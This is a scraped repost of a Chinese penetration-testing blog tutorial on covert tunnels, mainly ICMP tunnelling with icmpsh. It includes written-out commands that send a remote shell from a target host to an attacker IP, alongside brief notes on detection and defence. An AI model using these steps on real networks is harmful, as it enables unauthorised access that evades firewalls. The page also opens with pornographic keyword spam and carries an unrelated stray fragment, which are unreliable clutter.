日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

ipv6 访问内网_【内网渗透】—— 隐藏通信隧道技术之网络层隧道技术

發(fā)布時間:2024/7/5 编程问答 43 豆豆
生活随笔 收集整理的這篇文章主要介紹了 ipv6 访问内网_【内网渗透】—— 隐藏通信隧道技术之网络层隧道技术 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

hidden:是否完全隱藏控制面板,還有很多設(shè)置參數(shù),比如也可以設(shè)置顯示面板,然后設(shè)置寬高WIDTH=“整數(shù)” 和 HIGH=“整數(shù)”。

1. 隱藏通信隧道基礎(chǔ)1.1隱藏通信隧道技術(shù)概述
常用的隧道:網(wǎng)絡(luò)層:IPv6隧道,ICMP隧道,GRE隧道
傳輸層:TCP隧道,UDP隧道,常規(guī)端口轉(zhuǎn)發(fā)
應(yīng)用程:SSH隧道,HTTP隧道,HTTPS隧道,DNS隧道
1.2 判斷內(nèi)網(wǎng)的連通性綜合判斷各種協(xié)議(TCP,HTTP,DNS,ICMP)及端口通信的情況。常用的允許流量出的端口有 80,8080,443,53,110,123等。

內(nèi)網(wǎng)連通性判斷方法:

1,ICMP協(xié)議、
執(zhí)行命令 "ping “

2,TCP協(xié)議
netcat(nc)譽(yù)為瑞士軍刀,通過使用TCP或UDP協(xié)議的網(wǎng)絡(luò)連接讀寫數(shù)據(jù)
使用nc工具,執(zhí)行?nc

3,HTTP協(xié)議
curl是利用URL規(guī)則在命令行下工作的綜合傳輸工具,
支持文件下載和上傳 ,在windows系統(tǒng)中需要安裝
命令:curl
鏈接:https://pan.baidu.com/s/1uBF8eDXI9nBJXB2tbqikpQ
提取碼:zyx1

4,DNS協(xié)議
dns連通性,常用命令 ?:nslookup和dig
nslookup是windows自帶 dns探測命令,在沒有指定vps-ip時,nslookup會從系統(tǒng)網(wǎng)絡(luò)中的TCP/IP屬性中讀取DNS服務(wù)器的地址
輸入 nslookup 按回車鍵 輸入 help命令。

dig是linux自帶的命令 輸入dig -h顯示幫助信息
dig命令使用詳解
2. 網(wǎng)絡(luò)層隧道技術(shù)
在網(wǎng)絡(luò)層中 ,兩個常用的的隧道協(xié)議是IPv6 和IMCP
2.1 IPv6隧道
用來代替現(xiàn)行的IPv4協(xié)議的一種新IP協(xié)議
防御IPv6隧道攻擊的方法
了解IPv6的具體漏洞,結(jié)合其他協(xié)議,通過防火墻和深度防御系統(tǒng)過濾IPv6通信,提高主機(jī)和應(yīng)用程序的安全性
2.2 ICMP隧道
ICMP隧道簡單,實用,是一個比較特殊的協(xié)議 常見的ICMP消息為ping命令的回復(fù),將TCP/UDP數(shù)據(jù)封裝到ICMP的ping數(shù)據(jù)據(jù)包中,穿過防火墻,實現(xiàn)不受限制的網(wǎng)絡(luò)訪問
** icmpsh**
使用簡單不需要管理員權(quán)限
使用git clone命令下載icmpsh 下載地址

安裝python的impacket類庫 ?以便對TCP,UDP,ICMP,IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerbers,WML,LDAP等協(xié)議進(jìn)行訪問,
安裝python-impacket

apt-get?install?python-impacket

因為icmpsh工具會替代系統(tǒng)本身的ping命令的應(yīng)答程序,需要關(guān)閉本地系統(tǒng)的ICMP應(yīng)答(如果要恢復(fù)系統(tǒng)應(yīng)答,則設(shè)置為0),否則shell的運(yùn)行會不穩(wěn)定(表現(xiàn)為一直刷屏,無法進(jìn)入交互輸入)。

sysctl?-w?net.ipv4.icmp_echo_ignore_all=1

輸入 ?./run.sh?并運(yùn)行,會提示出現(xiàn)輸入目標(biāo)的IP地址(目標(biāo)主機(jī)的公網(wǎng)IP地址)

在目標(biāo)主機(jī)上查看ip地址,輸入如下命令:

icmpsh.exe?-t?192.168.227.137(攻擊機(jī)ip)?-d?30?-s?128

在目標(biāo)主機(jī)運(yùn)行以上命令,即可在VPS中看到 192.168.227.133得shell。

防御ICMP隧道攻擊的方法

網(wǎng)絡(luò)管理員會阻止ICMP通信進(jìn)入站點,在出站方向 ?ICMP通信是被允許的,目前大多數(shù)的網(wǎng)絡(luò)和邊界設(shè)備不會過濾ICMP流量
使用ICMP隧道時會產(chǎn)生大量的ICMP數(shù)據(jù)包,可以通過wireshark進(jìn)行ICMP數(shù)據(jù)包分析,已檢測惡意ICMP流量

版權(quán)聲明:本文為CSDN博主「Kris Alex」的原創(chuàng)文章,遵循CC 4.0 BY-SA版權(quán)協(xié)議,轉(zhuǎn)載請附上原文出處鏈接及本聲明。原文鏈接:https://blog.csdn.net/Kris__zhang/article/details/106743675

一如既往的學(xué)習(xí),一如既往的整理,一如即往的分享。感謝支持

【好書推薦】

2020hw系列文章整理(中秋快樂、國慶快樂、雙節(jié)快樂)

HW中如何檢測和阻止DNS隧道

ctf系列文章整理

日志安全系列-安全日志

【干貨】流量分析系列文章整理

【干貨】超全的 滲透測試系列文章整理

【干貨】持續(xù)性更新-內(nèi)網(wǎng)滲透測試系列文章

【干貨】android安全系列文章整理


掃描關(guān)注LemonSec

總結(jié)

以上是生活随笔為你收集整理的ipv6 访问内网_【内网渗透】—— 隐藏通信隧道技术之网络层隧道技术的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。